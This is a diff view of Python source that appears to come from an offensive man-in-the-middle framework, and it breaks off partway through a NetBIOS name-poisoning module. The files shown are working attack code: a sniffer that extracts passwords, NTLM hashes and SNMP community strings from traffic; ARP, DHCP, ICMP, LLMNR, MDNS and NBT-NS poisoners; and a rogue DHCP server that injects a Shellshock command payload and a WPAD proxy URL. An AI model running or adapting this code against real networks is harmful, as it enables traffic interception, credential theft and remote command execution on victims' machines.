basic_auth_creds = base64.decodestring(basic_auth_b64)
except Exception:
return
msg = 'Basic Authentication: %s' % basic_auth_creds
printer(src_ip_port, dst_ip_port, msg)
def parse_netntlm(authenticate_header, authorization_header, headers, ack, seq):
'''
Parse NTLM hashes out
'''
# Type 2 challenge from server
if authenticate_header != None:
chal_header = authenticate_header.group()
parse_netntlm_chal(headers, chal_header, ack)
# Type 3 response from client
elif authorization_header != None:
resp_header = authorization_header.group()
msg = parse_netntlm_resp_msg(headers, resp_header, seq)
if msg != None:
return msg
def parse_snmp(src_ip_port, dst_ip_port, snmp_layer):
'''
Parse out the SNMP version and community string
'''
if type(snmp_layer.community.val) == str:
ver = snmp_layer.version.val
msg = 'SNMPv%d community string: %s' % (ver, snmp_layer.community.val)
printer(src_ip_port, dst_ip_port, msg)
return True
def get_http_url(method, host, path, headers):
'''
Get the HTTP method + URL from requests
'''
if method != None and path != None:
# Make sure the path doesn't repeat the host header
if host != '' and not re.match('(http(s)?://)?'+host, path):
http_url_req = method + ' ' + host + path
else:
http_url_req = method + ' ' + path
http_url_req = url_filter(http_url_req)
return http_url_req
def headers_to_dict(header_lines):
'''
Convert the list of header lines into a dictionary
'''
headers = {}
for line in header_lines:
lineList=line.split(': ', 1)
key=lineList[0].lower()
if len(lineList)>1:
headers[key]=lineList[1]
else:
headers[key]=""
return headers
def parse_http_line(http_line, http_methods):
'''
Parse the header with the HTTP method in it
'''
http_line_split = http_line.split()
method = ''
path = ''
# Accounts for pcap files that might start with a fragment
# so the first line might be just text data
if len(http_line_split) > 1:
method = http_line_split[0]
path = http_line_split[1]
# This check exists because responses are much different than requests e.g.:
# HTTP/1.1 407 Proxy Authentication Required ( Access is denied. )
# Add a space to method because there's a space in http_methods items
# to avoid false+
if method+' ' not in http_methods:
method = None
path = None
return method, path
def parse_http_load(full_load, http_methods):
'''
Split the raw load into list of headers and body string
'''
try:
headers, body = full_load.split("\r\n\r\n", 1)
except ValueError:
headers = full_load
body = ''
header_lines = headers.split("\r\n")
# Pkts may just contain hex data and no headers in which case we'll
# still want to parse them for usernames and password
http_line = get_http_line(header_lines, http_methods)
if not http_line:
headers = ''
body = full_load
header_lines = [line for line in header_lines if line != http_line]
return http_line, header_lines, body
def get_http_line(header_lines, http_methods):
'''
Get the header with the http command
'''
for header in header_lines:
for method in http_methods:
# / is the only char I can think of that's in every http_line
# Shortest valid: "GET /", add check for "/"?
if header.startswith(method):
http_line = header
return http_line
def parse_netntlm_chal(headers, chal_header, ack):
'''
Parse the netntlm server challenge
https://code.google.com/p/python-ntlm/source/browse/trunk/python26/ntlm/ntlm.py
'''
try:
header_val2 = headers[chal_header]
except KeyError:
return
header_val2 = header_val2.split(' ', 1)
# The header value can either start with NTLM or Negotiate
if header_val2[0] == 'NTLM' or header_val2[0] == 'Negotiate':
try:
msg2 = header_val2[1]
except IndexError:
return
msg2 = base64.decodestring(msg2)
parse_ntlm_chal(msg2, ack)
def parse_ntlm_chal(msg2, ack):
'''
Parse server challenge
'''
global challenge_acks
Signature = msg2[0:8]
try:
msg_type = struct.unpack("<I",msg2[8:12])[0]
except Exception:
return
assert(msg_type==2)
ServerChallenge = msg2[24:32].encode('hex')
# Keep the dict of ack:challenge to less than 50 chals
if len(challenge_acks) > 50:
challenge_acks.popitem(last=False)
challenge_acks[ack] = ServerChallenge
def parse_netntlm_resp_msg(headers, resp_header, seq):
'''
Parse the client response to the challenge
'''
try:
header_val3 = headers[resp_header]
except KeyError:
return
header_val3 = header_val3.split(' ', 1)
# The header value can either start with NTLM or Negotiate
if header_val3[0] == 'NTLM' or header_val3[0] == 'Negotiate':
try:
msg3 = base64.decodestring(header_val3[1])
except binascii.Error:
return
return parse_ntlm_resp(msg3, seq)
def parse_ntlm_resp(msg3, seq):
'''
Parse the 3rd msg in NTLM handshake
Thanks to psychomario
'''
if seq in challenge_acks:
challenge = challenge_acks[seq]
else:
challenge = 'CHALLENGE NOT FOUND'
if len(msg3) > 43:
# Thx to psychomario for below
lmlen, lmmax, lmoff, ntlen, ntmax, ntoff, domlen, dommax, domoff, userlen, usermax, useroff = struct.unpack("12xhhihhihhihhi", msg3[:44])
lmhash = binascii.b2a_hex(msg3[lmoff:lmoff+lmlen])
nthash = binascii.b2a_hex(msg3[ntoff:ntoff+ntlen])
domain = msg3[domoff:domoff+domlen].replace("\0", "")
user = msg3[useroff:useroff+userlen].replace("\0", "")
# Original check by psychomario, might be incorrect?
#if lmhash != "0"*48: #NTLMv1
if ntlen == 24: #NTLMv1
msg = '%s %s' % ('NETNTLMv1:', user+"::"+domain+":"+lmhash+":"+nthash+":"+challenge)
return msg
elif ntlen > 60: #NTLMv2
msg = '%s %s' % ('NETNTLMv2:', user+"::"+domain+":"+challenge+":"+nthash[:32]+":"+nthash[32:])
return msg
def url_filter(http_url_req):
'''
Filter out the common but uninteresting URLs
'''
if http_url_req:
d = ['.jpg', '.jpeg', '.gif', '.png', '.css', '.ico', '.js', '.svg', '.woff']
if any(http_url_req.endswith(i) for i in d):
return
return http_url_req
def get_login_pass(body):
'''
Regex out logins and passwords from a string
'''
user = None
passwd = None
# Taken mainly from Pcredz by Laurent Gaffie
userfields = ['log','login', 'wpname', 'ahd_username', 'unickname', 'nickname', 'user', 'user_name',
'alias', 'pseudo', 'email', 'username', '_username', 'userid', 'form_loginname', 'loginname',
'login_id', 'loginid', 'session_key', 'sessionkey', 'pop_login', 'uid', 'id', 'user_id', 'screename',
'uname', 'ulogin', 'acctname', 'account', 'member', 'mailaddress', 'membername', 'login_username',
'login_email', 'loginusername', 'loginemail', 'uin', 'sign-in', 'usuario']
passfields = ['ahd_password', 'pass', 'password', '_password', 'passwd', 'session_password', 'sessionpassword',
'login_password', 'loginpassword', 'form_pw', 'pw', 'userpassword', 'pwd', 'upassword', 'login_password'
'passwort', 'passwrd', 'wppassword', 'upasswd','senha','contrasena']
for login in userfields:
login_re = re.search('(%s=[^&]+)' % login, body, re.IGNORECASE)
if login_re:
user = login_re.group()
for passfield in passfields:
pass_re = re.search('(%s=[^&]+)' % passfield, body, re.IGNORECASE)
if pass_re:
passwd = pass_re.group()
if user and passwd:
return (user, passwd)
def printer(src_ip_port, dst_ip_port, msg):
if dst_ip_port != None:
print_str = '[{} > {}] {}'.format(src_ip_port, dst_ip_port, msg)
# All credentials will have dst_ip_port, URLs will not
log.info("{}".format(print_str))
else:
print_str = '[{}] {}'.format(src_ip_port.split(':')[0], msg)
log.info("{}".format(print_str))

42
core/packetfilter.py Normal file
View file

@ -0,0 +1,42 @@
from core.utils import set_ip_forwarding, iptables
from core.logger import logger
from scapy.all import *
from traceback import print_exc
from netfilterqueue import NetfilterQueue
formatter = logging.Formatter("%(asctime)s [PacketFilter] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("PacketFilter", formatter)
class PacketFilter:
def __init__(self, filter):
self.filter = filter
def start(self):
set_ip_forwarding(1)
iptables().NFQUEUE()
self.nfqueue = NetfilterQueue()
self.nfqueue.bind(0, self.modify)
self.nfqueue.run()
def modify(self, pkt):
#log.debug("Got packet")
data = pkt.get_payload()
packet = IP(data)
for filter in self.filter:
try:
execfile(filter)
except Exception:
log.debug("Error occurred in filter", filter)
print_exc()
pkt.set_payload(str(packet)) #set the packet content to our modified version
pkt.accept() #accept the packet
def stop(self):
self.nfqueue.unbind()
set_ip_forwarding(0)
iptables().flush()

253
core/poisoners/ARP.py Normal file
View file

@ -0,0 +1,253 @@
# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging
import threading
from netaddr import IPNetwork, IPRange, IPAddress, AddrFormatError
from core.logger import logger
from time import sleep
from scapy.all import *
formatter = logging.Formatter("%(asctime)s [ARPpoisoner] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("ARPpoisoner", formatter)
class ARPpoisoner:
name = 'ARP'
optname = 'arp'
desc = 'Redirect traffic using ARP requests or replies'
version = '0.1'
def __init__(self, options):
try:
self.gatewayip = str(IPAddress(options.gateway))
except AddrFormatError as e:
sys.exit("Specified an invalid IP address as gateway")
self.gatewaymac = options.gatewaymac
if options.gatewaymac is None:
self.gatewaymac = getmacbyip(options.gateway)
if not self.gatewaymac: sys.exit("Error: could not resolve Gateway's mac address")
self.ignore = self.get_range(options.ignore)
if self.ignore is None: self.ignore = []
self.targets = self.get_range(options.targets)
self.arpmode = options.arpmode
self.debug = False
self.send = True
self.interval = 3
self.interface = options.interface
self.myip = options.ip
self.mymac = options.mac
self.arp_cache = {}
log.debug("gatewayip => {}".format(self.gatewayip))
log.debug("gatewaymac => {}".format(self.gatewaymac))
log.debug("targets => {}".format(self.targets))
log.debug("ignore => {}".format(self.ignore))
log.debug("ip => {}".format(self.myip))
log.debug("mac => {}".format(self.mymac))
log.debug("interface => {}".format(self.interface))
log.debug("arpmode => {}".format(self.arpmode))
log.debug("interval => {}".format(self.interval))
def start(self):
#create a L3 and L2 socket, to be used later to send ARP packets
#this doubles performance since send() and sendp() open and close a socket on each packet
self.s = conf.L3socket(iface=self.interface)
self.s2 = conf.L2socket(iface=self.interface)
if self.arpmode == 'rep':
t = threading.Thread(name='ARPpoisoner-rep', target=self.poison, args=('is-at',))
elif self.arpmode == 'req':
t = threading.Thread(name='ARPpoisoner-req', target=self.poison, args=('who-has',))
t.setDaemon(True)
t.start()
if self.targets is None:
log.debug('Starting ARPWatch')
t = threading.Thread(name='ARPWatch', target=self.start_arp_watch)
t.setDaemon(True)
t.start()
def get_range(self, targets):
if targets is None:
return None
try:
target_list = []
for target in targets.split(','):
if '/' in target:
target_list.extend(list(IPNetwork(target)))
elif '-' in target:
start_addr = IPAddress(target.split('-')[0])
try:
end_addr = IPAddress(target.split('-')[1])
ip_range = IPRange(start_addr, end_addr)
except AddrFormatError:
end_addr = list(start_addr.words)
end_addr[-1] = target.split('-')[1]
end_addr = IPAddress('.'.join(map(str, end_addr)))
ip_range = IPRange(start_addr, end_addr)
target_list.extend(list(ip_range))
else:
target_list.append(IPAddress(target))
return target_list
except AddrFormatError:
sys.exit("Specified an invalid IP address/range/network as target")
def start_arp_watch(self):
try:
sniff(prn=self.arp_watch_callback, filter="arp", store=0)
except Exception as e:
if "Interrupted system call" not in e:
log.error("[ARPWatch] Exception occurred when invoking sniff(): {}".format(e))
pass
def arp_watch_callback(self, pkt):
if self.send is True:
if ARP in pkt and pkt[ARP].op == 1: #who-has only
#broadcast mac is 00:00:00:00:00:00
packet = None
#print str(pkt[ARP].hwsrc) #mac of sender
#print str(pkt[ARP].psrc) #ip of sender
#print str(pkt[ARP].hwdst) #mac of destination (often broadcst)
#print str(pkt[ARP].pdst) #ip of destination (Who is ...?)
if (str(pkt[ARP].hwdst) == '00:00:00:00:00:00' and str(pkt[ARP].pdst) == self.gatewayip and self.myip != str(pkt[ARP].psrc)):
log.debug("[ARPWatch] {} is asking where the Gateway is. Sending the \"I'm the gateway biatch!\" reply!".format(pkt[ARP].psrc))
#send repoison packet
packet = ARP()
packet.op = 2
packet.psrc = self.gatewayip
packet.hwdst = str(pkt[ARP].hwsrc)
packet.pdst = str(pkt[ARP].psrc)
elif (str(pkt[ARP].hwsrc) == self.gatewaymac and str(pkt[ARP].hwdst) == '00:00:00:00:00:00' and self.myip != str(pkt[ARP].pdst)):
log.debug("[ARPWatch] Gateway asking where {} is. Sending the \"I'm {} biatch!\" reply!".format(pkt[ARP].pdst, pkt[ARP].pdst))
#send repoison packet
packet = ARP()
packet.op = 2
packet.psrc = self.gatewayip
packet.hwdst = '00:00:00:00:00:00'
packet.pdst = str(pkt[ARP].pdst)
elif (str(pkt[ARP].hwsrc) == self.gatewaymac and str(pkt[ARP].hwdst) == '00:00:00:00:00:00' and self.myip == str(pkt[ARP].pdst)):
log.debug("[ARPWatch] Gateway asking where {} is. Sending the \"This is the h4xx0r box!\" reply!".format(pkt[ARP].pdst))
packet = ARP()
packet.op = 2
packet.psrc = self.myip
packet.hwdst = str(pkt[ARP].hwsrc)
packet.pdst = str(pkt[ARP].psrc)
try:
if packet is not None:
self.s.send(packet)
except Exception as e:
if "Interrupted system call" not in e:
log.error("[ARPWatch] Exception occurred while sending re-poison packet: {}".format(e))
def resolve_target_mac(self, targetip):
targetmac = None
try:
targetmac = self.arp_cache[targetip] # see if we already resolved that address
#log.debug('{} has already been resolved'.format(targetip))
except KeyError:
#This following replaces getmacbyip(), much faster this way
packet = Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(op="who-has", pdst=targetip)
try:
resp, _ = sndrcv(self.s2, packet, timeout=2, verbose=False)
except Exception as e:
resp= ''
if "Interrupted system call" not in e:
log.error("Exception occurred while poisoning {}: {}".format(targetip, e))
if len(resp) > 0:
targetmac = resp[0][1].hwsrc
self.arp_cache[targetip] = targetmac # shove that address in our cache
log.debug("Resolved {} => {}".format(targetip, targetmac))
else:
log.debug("Unable to resolve MAC address of {}".format(targetip))
return targetmac
def poison(self, arpmode):
sleep(2)
while self.send:
if self.targets is None:
self.s2.send(Ether(src=self.mymac, dst='ff:ff:ff:ff:ff:ff')/ARP(hwsrc=self.mymac, psrc=self.gatewayip, op=arpmode))
elif self.targets:
for target in self.targets:
targetip = str(target)
if (targetip != self.myip) and (target not in self.ignore):
targetmac = self.resolve_target_mac(targetip)
if targetmac is not None:
try:
#log.debug("Poisoning {} <-> {}".format(targetip, self.gatewayip))
self.s2.send(Ether(src=self.mymac, dst=targetmac)/ARP(pdst=targetip, psrc=self.gatewayip, hwdst=targetmac, op=arpmode))
self.s2.send(Ether(src=self.mymac, dst=self.gatewaymac)/ARP(pdst=self.gatewayip, psrc=targetip, hwdst=self.gatewaymac, op=arpmode))
except Exception as e:
if "Interrupted system call" not in e:
log.error("Exception occurred while poisoning {}: {}".format(targetip, e))
sleep(self.interval)
def stop(self):
self.send = False
sleep(3)
count = 2
if self.targets is None:
log.info("Restoring subnet connection with {} packets".format(count))
pkt = Ether(src=self.gatewaymac, dst='ff:ff:ff:ff:ff:ff')/ARP(hwsrc=self.gatewaymac, psrc=self.gatewayip, op="is-at")
for i in range(0, count):
self.s2.send(pkt)
elif self.targets:
for target in self.targets:
targetip = str(target)
targetmac = self.resolve_target_mac(targetip)
if targetmac is not None:
log.info("Restoring connection {} <-> {} with {} packets per host".format(targetip, self.gatewayip, count))
try:
for i in range(0, count):
self.s2.send(Ether(src=targetmac, dst='ff:ff:ff:ff:ff:ff')/ARP(op="is-at", pdst=self.gatewayip, psrc=targetip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=targetmac))
self.s2.send(Ether(src=self.gatewaymac, dst='ff:ff:ff:ff:ff:ff')/ARP(op="is-at", pdst=targetip, psrc=self.gatewayip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=self.gatewaymac))
except Exception as e:
if "Interrupted system call" not in e:
log.error("Exception occurred while poisoning {}: {}".format(targetip, e))
#close the sockets
self.s.close()
self.s2.close()

147
core/poisoners/DHCP.py Normal file
View file

@ -0,0 +1,147 @@
# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging
import threading
import binascii
import random
from netaddr import IPAddress, IPNetwork
from core.logger import logger
from scapy.all import *
formatter = logging.Formatter("%(asctime)s [DHCPpoisoner] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("DHCPpoisoner", formatter)
class DHCPpoisoner():
def __init__(self, options):
self.interface = options.interface
self.ip_address = options.ip
self.mac_address = options.mac
self.shellshock = options.shellshock
self.netmask = options.netmask
self.debug = False
self.dhcp_dic = {}
log.debug("interface => {}".format(self.interface))
log.debug("ip => {}".format(self.ip_address))
log.debug("mac => {}".format(self.mac_address))
log.debug("netmask => {}".format(self.netmask))
log.debug("shellshock => {}".format(self.shellshock))
def start(self):
self.s2 = conf.L2socket(iface=self.interface)
t = threading.Thread(name="DHCPpoisoner", target=self.dhcp_sniff)
t.setDaemon(True)
t.start()
def stop(self):
self.s2.close()
def dhcp_sniff(self):
try:
sniff(filter="udp and (port 67 or 68)", prn=self.dhcp_callback, iface=self.interface)
except Exception as e:
if "Interrupted system call" not in e:
log.error("Exception occurred while poisoning: {}".format(e))
def get_client_ip(self, xid, dhcp_options):
try:
field_name, req_addr = dhcp_options[2]
if field_name == 'requested_addr':
return 'requested', req_addr
raise ValueError
except ValueError:
for field in dhcp_options:
if (field is tuple) and (field[0] == 'requested_addr'):
return field[1]
if xid in self.dhcp_dic.keys():
client_ip = self.dhcp_dic[xid]
return 'stored', client_ip
net = IPNetwork(self.ip_address + '/24')
return 'generated', str(random.choice(list(net)))
def dhcp_callback(self, resp):
if resp.haslayer(DHCP):
log.debug('Saw a DHCP packet')
xid = resp[BOOTP].xid
mac_addr = resp[Ether].src
raw_mac = binascii.unhexlify(mac_addr.replace(":", ""))
if resp[DHCP].options[0][1] == 1:
method, client_ip = self.get_client_ip(xid, resp[DHCP].options)
if method == 'requested':
log.info("Got DHCP DISCOVER from: {} requested_addr: {} xid: {}".format(mac_addr, client_ip, hex(xid)))
else:
log.info("Got DHCP DISCOVER from: {} xid: {}".format(mac_addr, hex(xid)))
packet = (Ether(src=self.mac_address, dst='ff:ff:ff:ff:ff:ff') /
IP(src=self.ip_address, dst='255.255.255.255') /
UDP(sport=67, dport=68) /
BOOTP(op='BOOTREPLY', chaddr=raw_mac, yiaddr=client_ip, siaddr=self.ip_address, xid=xid) /
DHCP(options=[("message-type", "offer"),
('server_id', self.ip_address),
('subnet_mask', self.netmask),
('router', self.ip_address),
('name_server', self.ip_address),
('dns_server', self.ip_address),
('lease_time', 172800),
('renewal_time', 86400),
('rebinding_time', 138240),
(252, 'http://{}/wpad.dat\\n'.format(self.ip_address)),
"end"]))
log.info("Sending DHCP OFFER")
self.s2.send(packet)
if resp[DHCP].options[0][1] == 3:
method, client_ip = self.get_client_ip(xid, resp[DHCP].options)
if method == 'requested':
log.info("Got DHCP REQUEST from: {} requested_addr: {} xid: {}".format(mac_addr, client_ip, hex(xid)))
else:
log.info("Got DHCP REQUEST from: {} xid: {}".format(mac_addr, hex(xid)))
packet = (Ether(src=self.mac_address, dst='ff:ff:ff:ff:ff:ff') /
IP(src=self.ip_address, dst='255.255.255.255') /
UDP(sport=67, dport=68) /
BOOTP(op='BOOTREPLY', chaddr=raw_mac, yiaddr=client_ip, siaddr=self.ip_address, xid=xid) /
DHCP(options=[("message-type", "ack"),
('server_id', self.ip_address),
('subnet_mask', self.netmask),
('router', self.ip_address),
('name_server', self.ip_address),
('dns_server', self.ip_address),
('lease_time', 172800),
('renewal_time', 86400),
('rebinding_time', 138240),
(252, 'http://{}/wpad.dat\\n'.format(self.ip_address))]))
if self.shellshock:
log.info("Sending DHCP ACK with shellshock payload")
packet[DHCP].options.append(tuple((114, "() { ignored;}; " + self.shellshock)))
packet[DHCP].options.append("end")
else:
log.info("Sending DHCP ACK")
packet[DHCP].options.append("end")
self.s2.send(packet)

60
core/poisoners/ICMP.py Normal file
View file

@ -0,0 +1,60 @@
# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging
import threading
from time import sleep
from core.logger import logger
from scapy.all import IP, ICMP, UDP, sendp
formatter = logging.Formatter("%(asctime)s [ICMPpoisoner] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("ICMPpoisoner", formatter)
class ICMPpoisoner():
def __init__(self, options):
self.target = options.target
self.gateway = options.gateway
self.interface = options.interface
self.ip_address = options.ip
self.debug = False
self.send = True
self.icmp_interval = 2
def build_icmp(self):
pkt = IP(src=self.gateway, dst=self.target)/ICMP(type=5, code=1, gw=self.ip_address) /\
IP(src=self.target, dst=self.gateway)/UDP()
return pkt
def start(self):
pkt = self.build_icmp()
t = threading.Thread(name='icmp_spoof', target=self.send_icmps, args=(pkt, self.interface, self.debug,))
t.setDaemon(True)
t.start()
def stop(self):
self.send = False
sleep(3)
def send_icmps(self, pkt, interface, debug):
while self.send:
sendp(pkt, inter=self.icmp_interval, iface=interface, verbose=debug)

119
core/poisoners/LLMNR.py Normal file
View file

@ -0,0 +1,119 @@
#!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import socket
import struct
import core.responder.settings as settings
import core.responder.fingerprint as fingerprint
import threading
from traceback import print_exc
from core.responder.packets import LLMNR_Ans
from core.responder.odict import OrderedDict
from SocketServer import BaseRequestHandler, ThreadingMixIn, UDPServer
from core.responder.utils import *
def start():
try:
server = ThreadingUDPLLMNRServer(('', 5355), LLMNRServer)
t = threading.Thread(name='LLMNR', target=server.serve_forever)
t.setDaemon(True)
t.start()
except Exception as e:
print "Error starting LLMNR server on port 5355: {}".format(e)
class ThreadingUDPLLMNRServer(ThreadingMixIn, UDPServer):
allow_reuse_address = 1
def server_bind(self):
MADDR = "224.0.0.252"
self.socket.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
self.socket.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255)
Join = self.socket.setsockopt(socket.IPPROTO_IP,socket.IP_ADD_MEMBERSHIP,socket.inet_aton(MADDR) + settings.Config.IP_aton)
if OsInterfaceIsSupported():
try:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
except:
pass
UDPServer.server_bind(self)
def Parse_LLMNR_Name(data):
NameLen = struct.unpack('>B',data[12])[0]
Name = data[13:13+NameLen]
return Name
def IsOnTheSameSubnet(ip, net):
net = net+'/24'
ipaddr = int(''.join([ '%02x' % int(x) for x in ip.split('.') ]), 16)
netstr, bits = net.split('/')
netaddr = int(''.join([ '%02x' % int(x) for x in netstr.split('.') ]), 16)
mask = (0xffffffff << (32 - int(bits))) & 0xffffffff
return (ipaddr & mask) == (netaddr & mask)
def IsICMPRedirectPlausible(IP):
dnsip = []
for line in file('/etc/resolv.conf', 'r'):
ip = line.split()
if len(ip) < 2:
continue
if ip[0] == 'nameserver':
dnsip.extend(ip[1:])
for x in dnsip:
if x !="127.0.0.1" and IsOnTheSameSubnet(x,IP) == False:
settings.Config.AnalyzeLogger.warning("[Analyze mode: ICMP] You can ICMP Redirect on this network.")
settings.Config.AnalyzeLogger.warning("[Analyze mode: ICMP] This workstation (%s) is not on the same subnet than the DNS server (%s)." % (IP, x))
else:
pass
if settings.Config.AnalyzeMode:
IsICMPRedirectPlausible(settings.Config.Bind_To)
# LLMNR Server class
class LLMNRServer(BaseRequestHandler):
def handle(self):
data, soc = self.request
Name = Parse_LLMNR_Name(data)
# Break out if we don't want to respond to this host
if RespondToThisHost(self.client_address[0], Name) is not True:
return None
if data[2:4] == "\x00\x00" and Parse_IPV6_Addr(data):
if settings.Config.Finger_On_Off:
Finger = fingerprint.RunSmbFinger((self.client_address[0], 445))
else:
Finger = None
# Analyze Mode
if settings.Config.AnalyzeMode:
settings.Config.AnalyzeLogger.warning("{} [Analyze mode: LLMNR] Request for {}, ignoring".format(self.client_address[0], Name))
# Poisoning Mode
else:
Buffer = LLMNR_Ans(Tid=data[0:2], QuestionName=Name, AnswerName=Name)
Buffer.calculate()
soc.sendto(str(Buffer), self.client_address)
settings.Config.PoisonersLogger.warning("{} [LLMNR] Poisoned request for name {}".format(self.client_address[0], Name))
if Finger is not None:
settings.Config.ResponderLogger.info("[FINGER] OS Version: {}".format(Finger[0]))
settings.Config.ResponderLogger.info("[FINGER] Client Version: {}".format(Finger[1]))

102
core/poisoners/MDNS.py Normal file
View file

@ -0,0 +1,102 @@
#!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import struct
import core.responder.settings as settings
import socket
import threading
from SocketServer import BaseRequestHandler, ThreadingMixIn, UDPServer
from core.responder.packets import MDNS_Ans
from core.responder.utils import *
def start():
try:
server = ThreadingUDPMDNSServer(('', 5353), MDNSServer)
t = threading.Thread(name='MDNS', target=server.serve_forever)
t.setDaemon(True)
t.start()
except Exception as e:
print "Error starting MDNS server on port 5353: {}".format(e)
class ThreadingUDPMDNSServer(ThreadingMixIn, UDPServer):
allow_reuse_address = 1
def server_bind(self):
MADDR = "224.0.0.251"
self.socket.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR, 1)
self.socket.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255)
Join = self.socket.setsockopt(socket.IPPROTO_IP,socket.IP_ADD_MEMBERSHIP, socket.inet_aton(MADDR) + settings.Config.IP_aton)
if OsInterfaceIsSupported():
try:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
except:
pass
UDPServer.server_bind(self)
def Parse_MDNS_Name(data):
try:
data = data[12:]
NameLen = struct.unpack('>B',data[0])[0]
Name = data[1:1+NameLen]
NameLen_ = struct.unpack('>B',data[1+NameLen])[0]
Name_ = data[1+NameLen:1+NameLen+NameLen_+1]
return Name+'.'+Name_
except IndexError:
return None
def Poisoned_MDNS_Name(data):
data = data[12:]
Name = data[:len(data)-5]
return Name
class MDNSServer(BaseRequestHandler):
def handle(self):
MADDR = "224.0.0.251"
MPORT = 5353
data, soc = self.request
Request_Name = Parse_MDNS_Name(data)
# Break out if we don't want to respond to this host
if (not Request_Name) or (RespondToThisHost(self.client_address[0], Request_Name) is not True):
return None
try:
# Analyze Mode
if settings.Config.AnalyzeMode:
if Parse_IPV6_Addr(data):
settings.Config.AnalyzeLogger.warning('{} [Analyze mode: MDNS] Request for {}, ignoring'.format(self.client_address[0], Request_Name))
# Poisoning Mode
else:
if Parse_IPV6_Addr(data):
Poisoned_Name = Poisoned_MDNS_Name(data)
Buffer = MDNS_Ans(AnswerName = Poisoned_Name, IP=socket.inet_aton(settings.Config.Bind_To))
Buffer.calculate()
soc.sendto(str(Buffer), (MADDR, MPORT))
settings.Config.PoisonersLogger.warning('{} [MDNS] Poisoned answer for name {}'.format(self.client_address[0], Request_Name))
except Exception:
raise

99
core/poisoners/NBTNS.py Normal file
View file

@ -0,0 +1,99 @@
#!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import socket
import threading
import core.responder.settings as settings
import core.responder.fingerprint as fingerprint
from core.responder.packets import NBT_Ans
from SocketServer import BaseRequestHandler, ThreadingMixIn, UDPServer
from core.responder.utils import *
def start():
try:
server = ThreadingUDPServer(('', 137), NBTNSServer)
t = threading.Thread(name='NBTNS', target=server.serve_forever)
t.setDaemon(True)
t.start()
except Exception as e:
print "Error starting NBTNS server on port 137: {}".format(e)
class ThreadingUDPServer(ThreadingMixIn, UDPServer):
allow_reuse_address = 1
def server_bind(self):
if OsInterfaceIsSupported():
try:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
except:
pass
UDPServer.server_bind(self)
# Define what are we answering to.
def Validate_NBT_NS(data):
if settings.Config.AnalyzeMode:
return False
if NBT_NS_Role(data[43:46]) == "File Server":
return True
if settings.Config.NBTNSDomain == True:
if NBT_NS_Role(data[43:46]) == "Domain Controller":
return True
if settings.Config.Wredirect == True:
